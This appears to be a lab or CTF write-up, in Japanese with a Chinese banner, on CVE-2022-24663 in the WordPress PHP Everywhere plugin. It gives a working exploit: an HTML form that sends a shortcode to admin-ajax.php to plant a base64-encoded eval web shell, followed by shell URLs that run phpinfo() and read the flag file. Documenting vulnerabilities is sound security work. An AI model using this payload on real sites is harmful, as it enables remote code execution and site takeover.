banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

CVE-2022-24663

image

产品简介#

WordPress は個人ブログシステムであり、徐々にコンテンツ管理システムソフトウェアに進化してきました。PHP 言語と MySQL データベースを使用して開発されており、ユーザーは PHP と MySQL データベースをサポートするサーバー上で独自のブログを使用することができます。

漏洞概要#

この脆弱性を利用すると、任意の PHP コードをサイト上で実行できるように、"ショートコード" パラメータを PHP Everywhere に設定したリクエストを送信することができます。

影響範囲#

<= 2.0.3
影響プラグイン:PHP Everywhere

悪用手順#

バックエンドアドレスにアクセスします:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin

アカウント:test/test

ダッシュボードの下部のコンテンツを削除し、ブラウザの F12 を押してノードを追加し、次の内容を入力します:

<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>

その後、実行してください(execute をクリック)。次のリンクにアクセスします:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php

ページが 200 を返します。

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);

修正案#

  • バージョンをアップグレードする

参考#

NVD - CVE-2022-24663

画像の出典

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。